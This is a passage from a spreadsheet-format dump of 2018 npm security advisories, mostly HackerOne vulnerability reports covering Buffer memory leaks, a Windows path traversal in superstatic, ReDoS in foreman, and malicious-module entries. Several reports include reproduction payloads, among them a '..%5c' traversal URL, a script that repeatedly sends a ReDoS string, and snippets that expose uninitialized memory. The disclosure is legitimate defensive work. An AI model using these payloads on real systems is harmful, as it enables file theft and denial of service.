&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let him know: Y&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: N&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I reported this initially on 2016-01-20 over email, but didn&amp;#39;t receive any response.&lt;br&gt;
Probably was deemed insignificant or out-of-scope, but I still think this should be fixed and disclosed.&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;Read uninitialized memory, extracting sensitive information from it.&lt;br&gt;
Cause a DoS by large Buffer allocation and conversion to string.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-02-27T13:52:05.982Z</t>
  </si>
  <si>
    <t>2018-05-12T08:56:12.533Z</t>
  </si>
  <si>
    <t>When a number is passed to the password property of config.setCredentialsByURI, npmconf/npm allocate uninitialized Buffer instances during conversion to base64 (on Node.js 4.x) due to missing type checks before passing user input to the new Buffer() constructor.</t>
  </si>
  <si>
    <t>Read uninitialized memory, extracting sensitive information from it.
Cause a DoS by large Buffer allocation and conversion to string.</t>
  </si>
  <si>
    <t xml:space="preserve">report Buffer allocation issue npmconf (and npm package js api). allows extract sensitive content uninitialized memory passing typed input setCredentialsByURI, limited 4.x below.  Module  module name  npmconf version  2.1.2 npm page  https //www.npmjs.com/package/npmconf  module name  npm version  5.6.0 npm page  https //www.npmjs.com/package/npm  Module Description   config thing npm uses   Module Stats  npmconf  40 292 downloads last day 219 837 downloads last week 897 947 downloads last month  ~1 0775 364 estimated downloads per year  npmconf deprecated, doesn"t mention security issues widely used, usage seems increase time.  npm  npm download stats not representive here, it"s mainly used CLI, not JS api, (e.g. comparison npmconf)   141 545 downloads last day 1 067 194 downloads last week 3 701 192 downloads last month  ~44 414 304 estimated downloads per year  Vulnerability  Vulnerability Description  When number passed password property config.setCredentialsByURI, npmconf/npm allocate uninitialized Buffer instances during conversion base64 (on 4.x) due missing type checks passing user input new Buffer() constructor.  Buffer instances (and likely will) contain sensitive information, Buffer knows everything.md.  4.x stated supported npm.  Steps Reproduce   Use 4.x LTS below.  npmconf var URI = Â« Â»https //registry.example.com 8661/Â« Â»; require("npmconf").load({}, function (err, conf) {   conf.setCredentialsByURI(URI, {username  "foo", email  "boo@example.com", password  200});   console.log(conf.getCredentialsByURI(URI)); // just outputs setting   // conf.save("user", function() {}) // Warning  writes base64 encoded uninitialized buffer .npmrc });  npm var URI = Â« Â»https //registry.example.com 8661/Â« Â»; require("npm").load({}, function (err, npm) {   npm.config.setCredentialsByURI(URI, {username  "foo", email  "boo@example.com", password  200});   console.log(npm.config.getCredentialsByURI(URI)); // just outputs setting   // npm.config.save("user", function() {}) // Warning  writes base64 encoded uninitialized buffer .npmrc });  Supporting Material/References    Arch Linux v4.8.7 (latest 4.x LTS branch) npm 5.6.0   Wrap   contacted maintainer let know  Y opened issue related repository  N   reported initially 2016 01 20 email, didn"t receive response. Probably deemed insignificant scope, think fixed disclosed.  Impact  Read uninitialized memory, extracting sensitive information it. Cause DoS large Buffer allocation conversion string. </t>
  </si>
  <si>
    <t>Read uninitialized memory, extracting sensitive information it.
Cause DoS large Buffer allocation conversion string.</t>
  </si>
  <si>
    <t>`superstatic` is vulnerable to path traversal on Windows</t>
  </si>
  <si>
    <t>/advisories/652</t>
  </si>
  <si>
    <t>2018-05-16T17:11:40.124+00:00</t>
  </si>
  <si>
    <t>superstatic</t>
  </si>
  <si>
    <t>https://www.npmjs.com/superstatic</t>
  </si>
  <si>
    <t>&lt;=5.0.1</t>
  </si>
  <si>
    <t>&gt;=5.0.2</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/319951.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report path traversal vulnerability in &lt;code&gt;superstatic&lt;/code&gt;&lt;br&gt;
It allows to read arbitrary out-of-dir files when running on the Windows platform&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; &lt;code&gt;superstatic&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 5.0.1&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/superstatic&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Superstatic is an enhanced static web server that was built to power. It has fantastic support for HTML5 pushState applications, clean URLs, caching, and many other goodies.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;2 196 downloads in the last day&lt;br&gt;
33 588 downloads in the last week&lt;br&gt;
139 118 downloads in the last month&lt;/p&gt;
&lt;p&gt;~1 669 416 estimated downloads per year&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;superstatic&lt;/code&gt; verifies that current dir is not evaded by checking the presense of &lt;code&gt;../&lt;/code&gt; in the decoded path, but on Windows, &lt;code&gt;..\&lt;/code&gt; works.&lt;br&gt;
Code: &lt;a title="https://github.com/firebase/superstatic/blob/v5.0.1/lib/providers/fs.js#L71" href="/redirect?signature=d4decea907204e13697863184268da18c8ded87b&amp;amp;url=https%3A%2F%2Fgithub.com%2Ffirebase%2Fsuperstatic%2Fblob%2Fv5.0.1%2Flib%2Fproviders%2Ffs.js%23L71" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://github.com/firebase/superstatic/blob/v5.0.1/lib/providers/fs.js#L71&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;Install and run superstatic (&lt;code&gt;npx superstatic&lt;/code&gt; in any dir). It could be also used as a Node.js lib.&lt;/p&gt;
&lt;p&gt;Go to &lt;code&gt;http://localhost:3474/..%5c..%5c..%5c/Windows/notepad.exe&lt;/code&gt; (adjust the path accordingly, that&amp;#39;s for &lt;code&gt;C:\Users\User\tmp&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Note: don&amp;#39;t use Edge for that, it decodes the path itself. Use e.g. Chromium.&lt;/em&gt;&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;OS: Windows 10&lt;/li&gt;
&lt;li&gt;Node.js v8.9.4&lt;/li&gt;
&lt;li&gt;npm v5.6.0&lt;/li&gt;
&lt;li&gt;Chromium&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let him know: N&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: N&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;Read any accessible files outside of the restricted directory.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-02-26T17:53:06.527Z</t>
  </si>
  <si>
    <t>2018-04-29T16:10:30.241Z</t>
  </si>
  <si>
    <t>superstatic verifies that current dir is not evaded by checking the presense of ../ in the decoded path, but on Windows, ..\ works.
Code: https://github.com/firebase/superstatic/blob/v5.0.1/lib/providers/fs.js#L71</t>
  </si>
  <si>
    <t>Read any accessible files outside of the restricted directory.</t>
  </si>
  <si>
    <t xml:space="preserve">report path traversal vulnerability superstatic allows read arbitrary dir files when running Windows platform  Module  module name  superstatic version  5.0.1 npm page  https //www.npmjs.com/package/superstatic  Module Description   Superstatic enhanced static web server built power. fantastic support HTML5 pushState applications, clean URLs, caching, goodies.   Module Stats  2 196 downloads last day 33 588 downloads last week 139 118 downloads last month  ~1 669 416 estimated downloads per year  Vulnerability  Vulnerability Description  superstatic verifies current dir not evaded checking presense ../ decoded path, Windows, ..  works. Code  https //github.com/firebase/superstatic/blob/v5.0.1/lib/providers/fs.js#L71  Steps Reproduce   Install run superstatic (npx superstatic dir). used lib.  Go http //localhost 3474/..%5c..%5c..%5c/Windows/notepad.exe (adjust path accordingly, that"s C  Users User tmp).  Note  don"t use Edge that, decodes path itself. Use e.g. Chromium.  Supporting Material/References    OS  Windows 10 v8.9.4 npm v5.6.0 Chromium   Wrap   contacted maintainer let know  N opened issue related repository  N   Impact  Read accessible files outside restricted directory. </t>
  </si>
  <si>
    <t>Read accessible files outside restricted directory.</t>
  </si>
  <si>
    <t>Module contains malicious test script</t>
  </si>
  <si>
    <t>/advisories/651</t>
  </si>
  <si>
    <t>2018-05-16T17:05:37.04+00:00</t>
  </si>
  <si>
    <t>ladder-text-js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ladder-text-js</t>
  </si>
  <si>
    <t>/advisories/650</t>
  </si>
  <si>
    <t>2018-05-16T16:58:37.825+00:00</t>
  </si>
  <si>
    <t>nothing-js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nothing-js</t>
  </si>
  <si>
    <t>Malicious Module</t>
  </si>
  <si>
    <t>/advisories/649</t>
  </si>
  <si>
    <t>2018-05-16T16:47:04.164+00:00</t>
  </si>
  <si>
    <t>getcookies</t>
  </si>
  <si>
    <t>https://www.npmjs.com/getcookies</t>
  </si>
  <si>
    <t>Cross-Site Scripting</t>
  </si>
  <si>
    <t>/advisories/648</t>
  </si>
  <si>
    <t>2018-05-16T16:37:22.969+00:00</t>
  </si>
  <si>
    <t>react-svg</t>
  </si>
  <si>
    <t>https://www.npmjs.com/react-svg</t>
  </si>
  <si>
    <t>&lt;=2.2.17</t>
  </si>
  <si>
    <t>&gt;=2.2.18</t>
  </si>
  <si>
    <t>/advisories/647</t>
  </si>
  <si>
    <t>2018-05-16T16:34:20.626+00:00</t>
  </si>
  <si>
    <t>rgb2hex</t>
  </si>
  <si>
    <t>https://www.npmjs.com/rgb2hex</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/319629.json</t>
  </si>
  <si>
    <t>`atob` allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below</t>
  </si>
  <si>
    <t>/advisories/646</t>
  </si>
  <si>
    <t>2018-05-16T16:30:50.523+00:00</t>
  </si>
  <si>
    <t>atob</t>
  </si>
  <si>
    <t>https://www.npmjs.com/atob</t>
  </si>
  <si>
    <t>&lt;=2.0.3</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/321686.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report an uninitialized Buffer allocation issue in &lt;code&gt;atob&lt;/code&gt;.&lt;br&gt;
It allows to extract sensitive data from uninitialized memory or to cause a DoS by passing in a large number, in setups where typed user input can be passed (e.g. from JSON), on Node.js 4.x and lower.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; &lt;code&gt;atob&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 2.0.3&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/atob&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Uses Buffer to emulate the exact functionality of the browser&amp;#39;s atob.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;492 191 downloads in the last day&lt;br&gt;
2 890 027 downloads in the last week&lt;br&gt;
11 036 537 downloads in the last month&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;The problem arises when a number is passed in, e.g. from user-submitted JSON-encoded data.&lt;br&gt;
The API should not propagate the already-bad Buffer issue further.&lt;/p&gt;
&lt;p&gt;On Node.js 4.x and below (4.x is still supported), this exposes uninitialized memory, which could contain sensitive data. This can be also used to cause a DoS by consuming the memory when large numbers are passed on input.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;console.log(require(&amp;#39;atob&amp;#39;)(1000))&lt;/code&gt; (note uninitialized memory in output)&lt;br&gt;
&lt;code&gt;console.log(require(&amp;#39;atob&amp;#39;)(1e8))&lt;/code&gt; (note memory usage and time)&lt;/p&gt;
&lt;p&gt;Run on Node.js 4.x (or below).&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Arch Linux Current&lt;/li&gt;
&lt;li&gt;Node.js 4.8.7&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let them know: N&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: N&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;Sensitive uninitialized memory exposure&lt;br&gt;
Denail of Service&lt;br&gt;
This issue affects only setups using Node.js 4.x (still supported) or lower.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-03-03T23:22:23.359Z</t>
  </si>
  <si>
    <t>2018-04-08T21:05:09.925Z</t>
  </si>
  <si>
    <t xml:space="preserve">report uninitialized Buffer allocation issue atob. allows extract sensitive data uninitialized memory cause DoS passing large number, setups typed user input passed (e.g. JSON), 4.x lower.  Module  module name  atob version  2.0.3 npm page  https //www.npmjs.com/package/atob  Module Description   Uses Buffer emulate exact functionality browser"s atob.   Module Stats  492 191 downloads last day 2 890 027 downloads last week 11 036 537 downloads last month  Vulnerability  Vulnerability Description  problem arises when number passed in, e.g. user submitted JSON encoded data. API not propagate already bad Buffer issue further.  4.x below (4.x supported), exposes uninitialized memory, contain sensitive data. used cause DoS consuming memory when large numbers passed input.  Steps Reproduce   console.log(require("atob")(1000)) (note uninitialized memory output) console.log(require("atob")(1e8)) (note memory usage time)  Run 4.x (or below).  Supporting Material/References    Arch Linux Current 4.8.7   Wrap   contacted maintainer let know  N opened issue related repository  N   Impact  Sensitive uninitialized memory exposure Denail Service issue affects setups using 4.x (still supported) lower. </t>
  </si>
  <si>
    <t>`foreman` is vulnerable to ReDoS in path</t>
  </si>
  <si>
    <t>/advisories/645</t>
  </si>
  <si>
    <t>2018-05-16T16:28:04.587+00:00</t>
  </si>
  <si>
    <t>foreman</t>
  </si>
  <si>
    <t>https://www.npmjs.com/foreman</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/320586.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report ReDoS in &lt;code&gt;foreman&lt;/code&gt;.&lt;br&gt;
It allows to cause denial of service by suppling a crafted path.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; foreman&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 2.0.0&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/foreman&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Node Foreman is a Node.js version of the popular Foreman tool, with a few Node specific changes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;5 296 downloads in the last day&lt;br&gt;
30 879 downloads in the last week&lt;br&gt;
141 342 downloads in the last month&lt;/p&gt;
&lt;p&gt;~1 696 104 estimated downloads per year&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;ReDoS.&lt;/p&gt;
&lt;p&gt;Regex: &lt;code&gt;/http:\/\/[^/]*:?[0-9]*(\/.*)$/&lt;/code&gt;&lt;br&gt;
Evil string: &lt;code&gt;http://${Array(81000).join(&amp;#39;0&amp;#39;)}&lt;/code&gt; (unwrap js template)&lt;br&gt;
Line: &lt;a title="https://github.com/strongloop/node-foreman/blob/v2.0.0/forward.js#L30" href="/redirect?signature=931e3620fe150963092e8b16b3aae86f2ab73786&amp;amp;url=https%3A%2F%2Fgithub.com%2Fstrongloop%2Fnode-foreman%2Fblob%2Fv2.0.0%2Fforward.js%23L30" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://github.com/strongloop/node-foreman/blob/v2.0.0/forward.js#L30&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;br&gt;
Blocks for ~5 seconds per request.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;nf start -f 9999&lt;/code&gt;&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;net&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;net&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;tick&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;net&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;createConnection&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;9999&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;`GET http://&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nb"&gt;Array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;81000&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;0&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)}&lt;/span&gt;&lt;span class="s2"&gt; HTTP/1.1
Host: localhost:9999
&amp;quot;`&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="nx"&gt;setInterval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;tick&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;OS: Arch Linux current&lt;/li&gt;
&lt;li&gt;Node.js 9.5.0&lt;/li&gt;
&lt;li&gt;npm 5.6.0&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let him know: N&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: N&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;Denial of Service by passing crafted paths.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-02-28T03:13:44.212Z</t>
  </si>
  <si>
    <t>2018-04-28T20:31:32.910Z</t>
  </si>
  <si>
    <t>ReDoS.</t>
  </si>
  <si>
    <t>Denial of Service by passing crafted paths.</t>
  </si>
  <si>
    <t xml:space="preserve">report ReDoS foreman. allows cause denial service suppling crafted path.  Module  module name  foreman version  2.0.0 npm page  https //www.npmjs.com/package/foreman  Module Description   Node Foreman version popular Foreman tool, few Node specific changes.   Module Stats  5 296 downloads last day 30 879 downloads last week 141 342 downloads last month  ~1 696 104 estimated downloads per year  Vulnerability  Vulnerability Description  ReDoS.  Regex  /http  / /[^/]* ?[0 9]*( /.*)$/ Evil string  http //${Array(81000).join("0")} (unwrap js template) Line  https //github.com/strongloop/node foreman/blob/v2.0.0/forward.js#L30 Blocks ~5 seconds per request.  Steps Reproduce   nf start  f 9999 const net = require("net"); const tick = function() { const client = net.createConnection({ port  9999 }, () =  {   client.write(`GET http //${Array(81000).join("0")} HTTP/1.1 Host  localhost 9999   Â« Â»`);   }); } setInterval(tick, 1000)  Supporting Material/References    OS  Arch Linux current 9.5.0 npm 5.6.0   Wrap   contacted maintainer let know  N opened issue related repository  N   Impact  Denial Service passing crafted paths. </t>
  </si>
  <si>
    <t>Denial Service passing crafted paths.</t>
  </si>
  <si>
    <t>`concat-with-sourcemaps` allocates uninitialized Buffers when number is passed as a separator</t>
  </si>
  <si>
    <t>/advisories/644</t>
  </si>
  <si>
    <t>2018-05-16T16:12:36.958+00:00</t>
  </si>
  <si>
    <t>concat-with-sourcemaps</t>
  </si>
  <si>
    <t>https://www.npmjs.com/concat-with-sourcemaps</t>
  </si>
  <si>
    <t>&lt;=1.0.5</t>
  </si>
  <si>
    <t>&gt;=1.0.6</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/320166.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report an uninitialized Buffer allocation issue in &lt;code&gt;concat-with-sourcemaps&lt;/code&gt;.&lt;br&gt;
It allows to extract sensitive data from uninitialized memory or to cause a DoS by passing in a large number, in (unlikely) setups where &lt;code&gt;separator&lt;/code&gt; is attacker-controlled.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; &lt;code&gt;concat-with-sourcemaps&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 1.0.5&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/concat-with-sourcemaps&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;NPM module for concatenating files and generating source maps.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;65 161 downloads in the last day&lt;br&gt;
360 873 downloads in the last week&lt;br&gt;
1 506 421 downloads in the last month&lt;/p&gt;
&lt;p&gt;~18 077 052 estimated downloads per year&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;See &lt;a title="https://github.com/floridoo/concat-with-sourcemaps/blob/master/index.js#L18" href="/redirect?signature=6b7c5f1e8cdbffe122a969265fd029ad9ce0a58d&amp;amp;url=https%3A%2F%2Fgithub.com%2Ffloridoo%2Fconcat-with-sourcemaps%2Fblob%2Fmaster%2Findex.js%23L18" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://github.com/floridoo/concat-with-sourcemaps/blob/master/index.js#L18&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The problem arises when a number is passed as a separator. That is unlikely to be attacker-controlled in real-world setups, but not impossible. The API should not propagate the already-bad Buffer issue further.&lt;/p&gt;
&lt;p&gt;On Node.js 6.x and below, this exposes uninitialized memory, which could contain sensitive data.&lt;/p&gt;
&lt;p&gt;On all Node.js versions, this can cause a DoS when a big enough number (e.g. 1e8 or 1e9) is specified as a separator.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;Uninitialized memory exposure (Node.js 6.x and below):&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;const Concat = require(&amp;#39;concat-with-sourcemaps&amp;#39;);
var concat = new Concat(true, &amp;#39;all.js&amp;#39;, 234); // separator is 234
concat.add(null, &amp;quot;// (c) John Doe&amp;quot;);
concat.add(&amp;#39;file1.js&amp;#39;, &amp;quot;const a = 10;&amp;quot;);
concat.add(&amp;#39;file2.js&amp;#39;, &amp;quot;const b = 20;&amp;quot;);
console.log(concat.content.toString(&amp;#39;utf-8&amp;#39;));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;DoS (any Node.js version):&lt;/p&gt;
&lt;p&gt;Use e.g. 1e8, 1e9, or 1e10 to cause different effect (and depending on the Node.js version).&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;const Concat = require(&amp;#39;concat-with-sourcemaps&amp;#39;);
var concat = new Concat(true, &amp;#39;all.js&amp;#39;, 1e8); // separator is 234
concat.add(null, &amp;quot;// (c) John Doe&amp;quot;);
concat.add(&amp;#39;file1.js&amp;#39;, &amp;quot;const a = 10;&amp;quot;);
concat.add(&amp;#39;file2.js&amp;#39;, &amp;quot;const b = 20;&amp;quot;);
console.log(concat.content.toString(&amp;#39;utf-8&amp;#39;));
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;OS: Arch Linux current&lt;/li&gt;
&lt;li&gt;Node.js 9.5.0&lt;/li&gt;
&lt;li&gt;npm 5.6.0&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let him know: N&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: N&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;Sensitive uninitialized memory exposure (on Node.js 6.x and below)&lt;br&gt;
Denail of Service&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-02-27T04:40:33.617Z</t>
  </si>
  <si>
    <t>2018-04-28T20:05:00.500Z</t>
  </si>
  <si>
    <t>See https://github.com/floridoo/concat-with-sourcemaps/blob/master/index.js#L18</t>
  </si>
  <si>
    <t>Sensitive uninitialized memory exposure (on Node.js 6.x and below)
Denail of Service</t>
  </si>
  <si>
    <t xml:space="preserve">report uninitialized Buffer allocation issue concat sourcemaps. allows extract sensitive data uninitialized memory cause DoS passing large number, (unlikely) setups separator attacker controlled.  Module  module name  concat sourcemaps version  1.0.5 npm page  https //www.npmjs.com/package/concat sourcemaps  Module Description   NPM module concatenating files generating source maps.   Module Stats  65 161 downloads last day 360 873 downloads last week 1 506 421 downloads last month  ~18 077 052 estimated downloads per year  Vulnerability  Vulnerability Description  https //github.com/floridoo/concat sourcemaps/blob/master/index.js#L18  problem arises when number passed separator. unlikely attacker controlled real world setups, not impossible. API not propagate already bad Buffer issue further.  6.x below, exposes uninitialized memory, contain sensitive data.  versions, cause DoS when big enough number (e.g. 1e8 1e9) specified separator.  Steps Reproduce   Uninitialized memory exposure (Node.js 6.x below)  const Concat = require("concat sourcemaps"); var concat = new Concat(true, "all.js", 234); // separator 234 concat.add(null, Â« Â»// (c) John DoeÂ« Â»); concat.add("file1.js", Â« Â»const = 10;Â« Â»); concat.add("file2.js", Â« Â»const b = 20;Â« Â»); console.log(concat.content.toString("utf 8"));  DoS (any version)   Use e.g. 1e8, 1e9, 1e10 cause different effect (and depending version). const Concat = require("concat sourcemaps"); var concat = new Concat(true, "all.js", 1e8); // separator 234 concat.add(null, Â« Â»// (c) John DoeÂ« Â»); concat.add("file1.js", Â« Â»const = 10;Â« Â»); concat.add("file2.js", Â« Â»const b = 20;Â« Â»); console.log(concat.content.toString("utf 8"));  Supporting Material/References    OS  Arch Linux current 9.5.0 npm 5.6.0   Wrap   contacted maintainer let know  N opened issue related repository  N   Impact  Sensitive uninitialized memory exposure (on 6.x below) Denail Service </t>
  </si>
  <si>
    <t>Sensitive uninitialized memory exposure (on 6.x below)
Denail Service</t>
  </si>
  <si>
    <t>[pdfinfojs] Command Injection on filename parameter</t>
  </si>
  <si>
    <t>/advisories/643</t>
  </si>
  <si>
    <t>2018-05-16T16:02:25.758+00:00</t>
  </si>
  <si>
    <t>pdfinfojs</t>
  </si>
  <si>
    <t>https://www.npmjs.com/pdfinfojs</t>
  </si>
  <si>
    <t>&lt;=0.4.0</t>
  </si>
  <si>
    <t>&gt;=0.4.1</t>
